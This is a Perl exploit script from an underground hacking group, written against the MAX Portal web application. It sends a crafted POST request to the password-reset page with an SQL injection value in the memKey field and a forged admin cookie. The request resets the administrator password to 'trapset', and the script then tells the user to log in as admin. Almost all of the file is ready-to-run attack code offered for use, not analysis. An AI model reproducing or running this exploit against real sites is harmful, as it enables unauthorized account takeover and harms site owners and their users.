#!/usr/bin/perl ################################################################# # T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m ################################################################# # EXPLOIT FOR - MAX Portal (All Versions) # #Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v ); #E-Mail : Alpha_Programmer@Yahoo.com # #This Xpl Change Admin's Pass in This Portal !! # #Discovered by: s d # ################################################################# # Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com # #And Iranian Hacking & Security Teams : # IHS , Shabgard , Emperor ,Crouz & Simorgh-ev ################################################################# use IO::Socket; if (@ARGV < 2) { print "\n==========================================\n"; print " \n -- Exploit By Alpha Programmer --\n\n"; print " Trap-Set Underground Hacking Team \n\n"; print " Usage: Max.pl \n\n"; print " V3rsion :\n"; print " 1 ==> Version 1.35 and 0lder\n"; print " 2 ==> Version 1.36, 2.0 and Next\n"; print "==========================================\n\n"; print "Example:\n\n"; print " Max.pl www.Site.com 1\n"; exit(); } $hell = "foo' or M_Name='admin"; if ($ARGV[1] =~"2" ){$hell = "foo%27%29+or+M_Name%3D%27admin%27+or+%28%271%27%3D%272"}; my $host = $ARGV[0]; my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); unless ($remote) { die "C4nn0t C0nn3ct to $host" } print "C0nn3cted\n"; $http = "POST /password.asp?mode=reset HTTP/1.0"; $http .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; $http .= "Accept-Language: fa\n"; $http .= "Content-Type: application/x-www-form-urlencoded\n"; $http .= "Pragma: no-cache\n"; $http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n"; $http .= "Host: $host\n"; $http .= "Content-Length: 111\n"; $http .= "Proxy-Connection: Keep-Alive\n"; $http .= "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86&Name=admin\n\n"; $http .= "pass=trapset&pass2=trapset&memId=-1&memKey=$hell&Submit=Submit\n\n\n\n"; print "\n"; print $remote $http; sleep(1); print "[+] Attacking ...\n"; print "[+] Changing Admin's Password ...\n"; while (<$remote>) { } print "\nNow Go to $host and Login With :\n\n"; print "User: admin\n"; print "Pass: trapset\n\n"; print "Enjoy ;)\n"; print "\n"; ### EOF ###